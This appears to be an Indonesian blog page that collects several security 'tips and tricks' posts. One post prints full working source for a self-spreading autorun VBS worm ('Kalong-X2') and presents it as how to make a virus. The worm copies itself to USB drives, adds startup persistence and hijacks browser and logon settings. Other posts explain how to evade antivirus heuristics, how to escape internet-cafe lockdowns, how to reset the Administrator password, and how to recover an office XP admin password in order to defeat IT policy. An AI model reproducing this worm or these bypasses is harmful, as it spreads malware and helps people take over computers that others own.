Teknik heuristik merupakan teknik yang dipakai antivirus untuk mendeteksi keberadaan virus2 baru atau yang belum terdapat di signature antivirus tersebut. Bagaimana caranya? Tentunya setiap antivirus memiliki cara sendiri2. Kita ambil contoh antivirus (yang lokal2 aja ya..) Ansav +E Advanced 1.7.8 (ga tau klo ada versi barunya) , av ini mengusung "Advanced Ansav Heuristic Engine". Pada AAHE ini, Ansav akan mendeteksi suatu file sebagai ancaman dengan dengan membandingkan suatu signature dengan entrypoint/PE Header pada body file. Yah kurang lebih begitu. Sedangkan pada PCMAV rc23, heuristik andalannya yaitu dengan mengecek jika suatu file mempunyai signature suatu icon tertentu. Maksudnya jika kita membuat program yang mengandung icon folder (baik sebagai icon file atau resource) maka PCMAV akan menganggap file tersebut sebagai ancaman.
Namun teknik-teknik heuristik tersebut dapat dilewati/ heuristic bypassing dengan mudah, misalnya pada Ansav, kita dapat memakai program packer2 yang tidak terdapat di "database" heuristiknya Ansav. Sedangkan pada PCMAV, ya.. paling gampang tinggal ga pake icon2 yang dianggap ancaman (icon folder, word dsb) atau mengubah struktur body icon memakai program hex editor (namun hati2 biar icon ga berubah gambar)
Pada kesempatan ini saya akan membahas teknik heuristik untuk mendeteksi worm VBS. Ini karena penasaran sama PCMAV yang selau aja jitu menebak VBS worm. Ceritanya ketika teman saya minta bersihiin virus, truz ternyata terdeteksi sebagai worm oleh antivirus luar di pc saya, iseng pengen nyoba kehebatan antivirus saya tersebut, saya mencoba mengenkripsi worm tersebut, dimana tulisan "Scripting.FileSystemObject" saya enkripsi menjadi Chr(83) + Chr(99) + Chr(114) + Chr(105) + Chr(112) + Chr(116) + Chr(105) + Chr(110) + Chr(103) + Chr(46) + Chr(70) + Chr(105) + Chr(108) + Chr(101) + Chr(83) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Chr(79) + Chr(98) + Chr(106) + Chr(101) + Chr(99) + Chr(116)
Tadaaa... ternyata antivirus saya tidak mampu mendeteksinya... Kemudian teringat PCMAV (soalnya pernah baca diweb resminya klo PCMAV punya heuristik canggih buat mendeteksi file VBS). Pas discan pake PCMAV ternyata terdeteksi. Ya udah saya enkripsi semua string. Ehhh ternyata masih terdeteksi... hebat2... ini antivirus punya paranoid heuristik Setelah saya teliti2 hampir seribu detik, ternyata heuristiknya PCMAV yaitu dengan mendeteksi beberapa tulisan yang tidak mungkin tidak dipakai oleh suatu worm, yaitu salah satunya kombinasi command "CreateObject" dan "wscript.scriptfullname". Tulisan ini gimana ya enkripsinya?? soalnya tipe tulisan ini bukanlah string, melainkan command internal pada VBS. Klo di Delphi command2 mungkin bisa dienkripsi,itu mungkin juga cuma command2 yang memakai API misalnya "UrlDownloadToFile" dimana memanggil dari file urlmon.dll. Yah main2in memory (GetProcAddress).
Tapi, saya ga akan membahas bagaimana caranya heuristic bypassing, malez bo klo banyak virus canggih, ntar klo ada cewek minta tolong saya bersiin pcnya dan saya ga bisa
kan.. giiitu dech... Ok.. lanjut, kita kita akan bikin program dasar untuk mendeteksi worm VBS.
Yang kita perlukan adalah VB6 dan :Komponen dan namaTextBox : Text1CommandButton : Command1CommandButton : Command2CommonDialog : CommonDialog1
Pada Command1 isikan :
CommonDialog1.Filter = "VBS File (*.vbs)*.VBS"CommonDialog1.ShowOpenIf CommonDialog1.FileName = "" Then Exit SubText1.Text = CommonDialog1.FileName
Pada Command 2 isikan :
Vbs_Checker Text1.Text
Kemudian buat fungsi sebagai berikut :
Public Function Vbs_Checker(ByVal target As String)
If target = "" Then Exit FunctionIf Dir$(target) = "" Then Exit Function
On Error Resume Next
Open target For Input As #1While EOF(1) = FalseDoEvents
Line Input #1, maltextmaltext = " " & maltextmaltext = LCase(maltext)
If InStr(maltext, "createobject") > 0 Then GoSub warningIf InStr(maltext, "regwrite") > 0 Then GoSub warningIf InStr(maltext, "wscript.scriptfullname") > 0 Then GoSub warningIf InStr(maltext, "ActiveDocument.Shapes.AddOLEObject") > 0 Then GoSub warning
Wend
Exit Function
warning:MsgBox "Suspected command : " & maltext, vbExclamation, "Warning"ReturnEnd Function
Seharusnya kode2 di atas self explained, tapi saya jelasin lagi deh buat pemula kaya saya. Inti dari program tersebut yaitu membaca file VBS yang kita pilih dan membandingkan isi file VBS dengan tulisan tertentu, misalnya "createobject". Jika ketemu tulisan tersebut maka keluar peringatan.
Sekali-lagi, kode2 di atas hanyalah konsep untuk mendeteksi worm VBS. Mungkin lebih baik dengan membandingkan lebih dari satu kata untuk mencegah indikasi false alarm.
06 Februari 2008
Trik Mereset Password Windows 9x
Password pada windows 9x sebenarnya sangat rentan dan tidak di disain untuk menjaga keamanan usernya. System operasi ini sebenarnya hanyalah untuk penggunaan personal atau yang dinamakan home user. Trik berikut bisa anda gunakan untuk mengganti password ataupun mematikan password pada system operasi windows 9x. Sebenarnya password pada 9x tidak terlalu berguna, misalkan pada saat di minta memasukkan password toh kita bisa menekan escape dan segalanya selesai. Hanya saja jika tekan escape, maka otomatis fasilitas jaringan tidak akan di jalankan. Gimana jika ada password yang ingin kita ganti ? setiap kita memasukkan nama dan password pada 9x, maka akan diciptakan file dengan format namalogin.pwl. Anda tinggal cari file ini kemudian hapus dan account itu anda tinggal create ulang. Dengan cara ini pula anda bisa mengetahui ada account apa-apa saja yang terdapat pada windows 9x anda.
Akali Billing Explorer Saat Ber-Internet
Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka, klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan... apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer: Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba... Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya... ==> Pertama Buka GPEdit.msc dulu caranya: C:\Windows\System32\GPEdit.msc <-- double Click ------------------------------------------ start. ------------------------------------------ --------------------------------------- GPEdit.msc --------------------------------------- 1. Jika Klik Kanan di Desktop tidak bisa Masuk Ke GPEdit.msc Masuk ke [User Configuration/Administrative Templates/Desktop] - Disable (Hide and disable all items on the desktop) Jika MyComputer tidak ada - Disable (Remove My Computer icon on the Desktop) 2. Jika Ingin mengubah properties pada taskbar start menu masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar] - Disable (Prevent changes to Taskbar and Start Menu Settings) Jika Menu Run tidak muncul - Disable (Remove Run menu from Start Menu) Jika menu pada taskbar saat klik kanan tidak muncul - Disable (Remove access to the context menus for the taskbar) 3. Apabila Control Panel tidak bisa di akses Masuk ke [User Configuration/Administrative Templates/Control Panel] - Disable (Prohibit access to the Control Panel) 4. Jika Command Prompt tidak bisa di akses Masuk ke [User Configuration/Administrative Templates/System] - Disable (Prevent access to the command prompt) Jika Registry Editor tidak bisa di akses - Disable (Prevent access to registry editing tools) 5. Jika Task Manager tidak bisa di akses Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options] - Disable (Remove Task Manager) 6. Jika Folder Options pada Windows Explorer tidak muncul Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer] - Disable (Remove these Folder Options menu item from the Tools menu) Jika Windows Key tidak berfungsi - Disable (Turn off Windows+X hotkeys) --------------------------------------- GPEdit.msc --------------------------------------- ------------------------------------------- end -------------------------------------------- ==> Setelah GPEdit.msc terbuka baru buka Registry Tools caranya: C:\Windows\System32\regedit.exe <-- double Click --- atau --- C:\Windows\regedit.exe <-- double Click ------------------------------------------ start. ------------------------------------------ --------------------------------------- Regedit. --------------------------------------- Regedit4 [HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD] "loadvxd"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives"=dword:00000000 "LinkResolveIgnoreLinkInfo"=dword:00000000 "NoFolderOptions"=dword:00000000 "ClearRecentDocsOnExit"=dword:00000000 "NoTrayContextMenu"=dword:00000000 "EnforceShellExtensionSecurity"=dword:00000000 "NoPrinterTabs"=dword:00000000 "NoDeletePrinter"=dword:00000000 "NoAddPrinter"=dword:00000000 "NoRun"=dword:00000000 "NoSetFolders"=dword:00000000 "NoSetTaskbar"=dword:00000000 "NoClose"=dword:00000000 "NoViewContextMenu"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 "NoDispScrSavPage"=dword:00000000 "NoDispAppearancePage"=dword:00000000 "NoDispSettingsPage"=dword:00000000 "NoAdminPage"=dword:00000000 "NoProfilePage"=dword:00000000 "NoDevMgrPage"=dword:00000000 "NoConfigPage"=dword:0000000 "NoFileSysPage"=dword:00000000 "NoDispCPL"=dword:00000000 "NoDispBackgroundPage"=dword:00000000 "NoVirtMemPage"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network] "NoFileSharingControl"=dword:00000000 "NoPrintSharingControl"=dword:00000000 "NoNetSetup"=dword:00000000 "NoNetSetupIDPage"=dword:00000000 "NoNetSetupSecurityPage"=dword:00000000 "NoEntireNetwork"=dword:00000000 "NoWorkgroupContents"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] "NoRealMode"=dword:00000000 "Disable"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop] "NoHTMLWallPaper"=dword:00000000 "NoChangingWallPaper"=dword:00000000 "NoCloseDragDropBands"=dword:00000000 "NoMovingBands"=dword:00000000 "NoAddingComponents"=dword:00000000 "NoDeletingComponents"=dword:00000000 "NoEditingComponents"=dword:00000000 "NoClosingComponents"=dword:00000000 [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoFolderOptions"=dword:00000000 [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableCMD"=dword:00000000 "DisableRegistryTools"=dword:00000000 [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced] "Hidden"=dword:00000000 "HideFileExt"=dword:00000000 "ShowSuperHidden"=dword:00000000 --------------------------------------- Regedit. --------------------------------------- ------------------------------------------- end -------------------------------------------- ==> Setelah regedit.exe terbuka baru ubah password administrator <-- (Ini yang di tunggu2x) caranya: C:\Windows\System32\compmgmt.msc <-- double Click ------------------------------------------ start. ------------------------------------------ ------------------------------------ Administrator. ------------------------------------- Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User - Klik kanan Administrator -> Set Password - Ketik New Password: ********** Confirm Password: ********** Selesai deh!!!!!!!!!!!!! ------------------------------------ Administrator. ------------------------------------- ------------------------------------------- end -------------------------------------------- &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& --------------------------------------------------------------------------------------------- Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus --------------------------------------- Bonus - Bonus --------------------------------------- Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu caranya: - Masuk ke Folder misalnya: C:/Windows/System32 - Trus klik salah satu file dalam folder itu misalnya: TaskMgr.exe - Kemudian klik menu File pada Win Explorer - Run as... - Klik The following user -> Masukkan passwordnya Username: Administrator Password: ******** - Selesai NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara lain silakan anda temukan sendiri, selamat mencoba....!
Kalau ada komentar silahkan posting....
Kalau ada komentar silahkan posting....
Bikin & Hapus Virus Autorun tanpa Antivirus
Artikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sampel virus ini yaitu virus dengan nama k4l0n6 yang telah menginfeksi PC gw. Adapun cara membuat virus autorun sebagai berikut 1. script coding pertama [autorun] shellexecute=wscript.exe k4l0n6.sys.vbs simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik) 2. script coding kedua 'Kalong-X2 'Varian dari Kalong.VBS on error resume next 'Dim kata-kata berikutdim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd 'siapkan isi autorunisi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.sys.vbs"set longka = createobject("Scripting.FileSystemObject")set mf = longka.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlfloopdo 'buat file indukSet windowpath = longka.getspecialfolder(0)Set syspath = longka.getspecialfolder(1)set tf = longka.getfile(syspath & "\recycle.vbs")tf.attributes = 32set tf = longka.createtextfile(syspath & "\recycle.vbs",2,true)tf.write rekurtf.closeset tf = longka.getfile(syspath & "\recycle.vbs")tf.attributes = 39 'sebar ke removable disc ditambahkan dengan Autorun.inffor each desades in longka.drives If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")tf.attributes =32set tf=longka.createtextfile(desades.path &"\k4l0n6.sys.vbs",2,true)tf.write rekurtf.closeset tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")tf.attributes = 39 set tf =longka.getfile(desades.path &"\autorun.inf")tf.attributes = 32set tf=longka.createtextfile(desades.path &"\autorun.inf",2,true)tf.write isitf.closeset tf = longka.getfile(desades.path &"\autorun.inf")tf.attributes=39end ifnext 'Manipulasi Registryset kalong = createobject("WScript.Shell") 'Ubah IE Titlekalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: X2 ATTACK ::" 'Ubah tulisan pertama pada text box menu RUNkalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "KALONG-X2/1"kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a" 'Buat pesan saat Windows Startupkalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "KALONG-X2"kalong.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Komputer Anda Diambil Alih" 'Aktifkan saat Windows Startupkalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\recycle.vbs" 'Ubah Default Start Page Internet Explorerkalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.vaksin.com/" 'Bonusif check <> 1 thenWscript.sleep 200000end ifloop while check <> 1set sd = createobject("Wscript.shell")sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik) secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk. Adapun cara menanggulangi virus tersebut yaitu dengan cara - tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK - sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut - langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)
jgn lupa ninggalin komentar ya...
gw kan dah baik bikin tips ini bwt loe smua...hehehe...
For ngoni2 org Mdo...ator jo...!!!
jgn lupa ninggalin komentar ya...
gw kan dah baik bikin tips ini bwt loe smua...hehehe...
For ngoni2 org Mdo...ator jo...!!!
Membasmi Virus di Flashdisk
Temen2 semua pasti pernah kesal dengan yang namanya virus komputer.Udah capek2 ngetik laporan atau skripsi eh…tiba-tiba pas dibuka di komputer udah berubahaja menjadi aplikasi atau yang berekstensi .Exe
Dont worry……..karena sebenarnya data temen-temen ntu g hilang,,tapi cuma di sembunyikan alias di superhiddenkanaj sama ntu virus,,so sekarang Aibi pengen berbagi neh,cara ntuk mengembalikan data temen-temen semua….
yang harus di persiapkan :1. Flashdisk temen-temen yang terinfeksi virus2. segelas capucino panas3. satu bungkus tango (kalau belum ada segera beli ke warung di depan………)(^_^)
nah ini langkah-langkahnya :1. colokin flashdisk teman-teman ke komputer,apabila autorunnya hidup harap cancel aj…2. buka flash dari explorer dengan cara klik kanan START > explorer trus buka flashdisk nya,,3. trus klik View > Detail4. lalu klik tulisan type sekali,,5. Nah kalo ada folder atau file MS word / MS excel tapi type nya aplikasi berarti ntu adalah virus..6. Langsung aja hapus semua dengan di block terlebih dahulu trus pencet SHIFT+DELETE aj..7. Sekarang flash nya keliatan kosong khan padahal sebenarnya ngak loh…8. teguk dulu kapucino nya…(^_0)9. SaaTnya untuk mengembalikan data temen-temen semua…10.Buka command prompt dengan cara klik start lalu ambil run kemudian klik cmd11.Setelah ada di prompt (yang layarnya hitam ntu loh)..12.lalu pindah ke flashdisk temen,misalnya flash saya di detech sebagai drive E di komputer,makayang saya klik di Command promot adalah E:contoh:C:\>E:13.maka akan pindah ke drive E,14.kemudian ketikan Attrib -s -h /D /S15.Simsalabim…data temen-temen yang hilang tadi telah kembali,,16.Selamat menemukan sesuatu yang hilang(Ha…ha….)
NB: Kalau virusnya udah merambah ke drive C,,Cara terbaiknya install ulang aja komputernya lagi…
Dont worry……..karena sebenarnya data temen-temen ntu g hilang,,tapi cuma di sembunyikan alias di superhiddenkanaj sama ntu virus,,so sekarang Aibi pengen berbagi neh,cara ntuk mengembalikan data temen-temen semua….
yang harus di persiapkan :1. Flashdisk temen-temen yang terinfeksi virus2. segelas capucino panas3. satu bungkus tango (kalau belum ada segera beli ke warung di depan………)(^_^)
nah ini langkah-langkahnya :1. colokin flashdisk teman-teman ke komputer,apabila autorunnya hidup harap cancel aj…2. buka flash dari explorer dengan cara klik kanan START > explorer trus buka flashdisk nya,,3. trus klik View > Detail4. lalu klik tulisan type sekali,,5. Nah kalo ada folder atau file MS word / MS excel tapi type nya aplikasi berarti ntu adalah virus..6. Langsung aja hapus semua dengan di block terlebih dahulu trus pencet SHIFT+DELETE aj..7. Sekarang flash nya keliatan kosong khan padahal sebenarnya ngak loh…8. teguk dulu kapucino nya…(^_0)9. SaaTnya untuk mengembalikan data temen-temen semua…10.Buka command prompt dengan cara klik start lalu ambil run kemudian klik cmd11.Setelah ada di prompt (yang layarnya hitam ntu loh)..12.lalu pindah ke flashdisk temen,misalnya flash saya di detech sebagai drive E di komputer,makayang saya klik di Command promot adalah E:contoh:C:\>E:13.maka akan pindah ke drive E,14.kemudian ketikan Attrib -s -h /D /S15.Simsalabim…data temen-temen yang hilang tadi telah kembali,,16.Selamat menemukan sesuatu yang hilang(Ha…ha….)
NB: Kalau virusnya udah merambah ke drive C,,Cara terbaiknya install ulang aja komputernya lagi…
Bikin AntiVirus di Flashdisk
Mungkin temen-temen semua dah pada tau cara bikin AUTORUN pada flashdisk..nah disini kita akan memanfaatkan cara ntuk membuat autorun tersebut ntuk mengaktif’in anti virus yang nantinya akan kita copy pada flashdisk kita.. Alat & bahan : ————– software AV yang berukuran kecil (banyak di internet,,goggling aj..) contoh: PCMAV,ANSAV,SMADAV dll..(tapi Aibi lebih sering pake PCMAV..abiz ukurannya kecil banget n’familiar buat semua orang…) Langkah-langkah: —————- 1.ketik di notepad mantera berikut: [AutoRun] open=namaantivirus.exe shellexecute=namaantivirus.exe shell\Scan Dulu Virusnya!!!\command=namaantivirus.exe shell=Scan Dulu Virusnya!!! 2.trus save dengan nama “autorun.inf”(gak pake tanda kutip) di flashdisk kita sekarang tinggal kita copy aja antivirus yang mau kita masukin ke flashdisk..!!! (NB:kalo ngopy file autorun n’ antivirusnya jangan di dalam folder) Dah jadi deh…^_^!! kalo mau scan virus tinggal double click aja tuh drive flashdisk kita!! kalo kita klik kanan drive flashdisknya bakalan ada tambahan kata di atas kata AUTOPLAY. Scan Dulu Virusnya!!! kalo mau di ubah ya kita tinggal ganti aja kata-kata yang ada di dalam script…! shell\kata-kata_anda\command=namaantivirus.exe shell=kata-kata_anda 3.trus gimana cara buka flashdisknya nih??? gak mungkin lah gak pada tau…tinggal klik kanan aja trus cari open…! ngak bagus ya kalo di dalam flashdisk kita ada keliatan nama file AUTORUN n’antivirusnya… ngerusak pemandangan gitu loh…. kalo gitu tinggal kita ubah aja attributnya jadi super hidden… caranya…??? /media/TDY296/TIPS N TRIK/install printer di Ubuntu.txt buka RUN dari start menu terus ketik cmd masuk ke dalam drive flashdisk (biasanya drive f:) udah gitu ya kita tulis commandnya f:\>attrib +h +s namaantivirus.exe (buat hidden antivirusnya) f:\>attrib +h +s autorun.inf (buat hidden file autorun)
Temukan Password Admin Win - XP
Memang hidup dijaman sekarang yang sulit semakin sulit bila setiap keinginan kita untuk “berkembang” dikekang. Bagi karyawan perkantoran yang menggunakan komputer dengan OS Windows XP akan makin terkekang kebebasannya karena komputer hanya bisa digunakan hanya untuk kerja dan kerja. Memang ini merupakan IT policy setiap kantor yang tidak memperbolehkan untuk menginstall bermacam2 program tapi hal inilah yang membuat para karyawan sulit untuk berkembang. Memang harus diakui ada sisi baik dan ada juga sisi buruk dari penerapan IT Policy. Tapi kali ini kita sedikit mengabaikan sisi baik dari IT policy tersebut dan lebih mensupport para karyawan untuk bisa berkembang. Artikel ini sedikit memberi gambaran bahwa setiap ada kesulitan pasti ada jalan keluar. Di dunia maya ini banyak sekali artikel yang membahas tentang cara membongkar password administrator Windows XP bahkan sudah banyak program yang dibuat untuk mereset ataupun mengganti password tersebut. Tentunya jika kita ingin bermain manis, kita tidak perlu melakukan cara-cara kasar tersebut karena resiko yang kita ambil akan lebih besar. Cara yang digunakan untuk menemukan password administartor sangat simple dan tidak perlu banyak pengetahuan yang dibutuhkan hanya tinggal mengikuti langkah dibawah ini : Keperluan yang dibutuhkan untuk mengetahui password administrator antara lain 1 buah disket, akses internet dan email: 1. langkah pertama adalah mendownload file image.exe dari http://www.loginrecovery.com/referal.php?p=2 2. Buat bootable disk dengan menjalankan file tersebut 3. Matikan computer lalu boot dengan menggunakan disk tersebut. (disk tersebut akan menghasilkan satu buah file upload.txt) 4. Setelah itu masuk ke windows xp secara normal (sebelumnya keluarkan disket) lalu buka http://www.loginrecovery.com/instructions.php 5. Masukkan disket lalu pilih upload.txt, masukkan alamat email dan access code lalu klik submit. 6. Kita akan mendapatkan konfirmasi lewat email untuk mengetahui password kita telah selesai. Sebenarnya website ini sangat cepat sekali untuk menemukan password tetapi karena kita menggunakannya secara gratisan maka harus menunggu 48 jam (2 hari) untuk bisa melihat password administrator, kecuali kalau mau bayar, dimenit itu juga password bisa ketahuan. 7. Bila telah 48 jam (lama bener yah ..) buka http://www.loginrecovery.com/results.php , masukkan alamat email saat kita mengupload, klik view lalu masukkan access code and .. password administrator ditemukan Memang segala sesuatu tidak ada yang sempurna tetapis situs ini mengklaim keberhasilan menemukan password diatas 98.5% hebat bukan …
Langganan:
Komentar (Atom)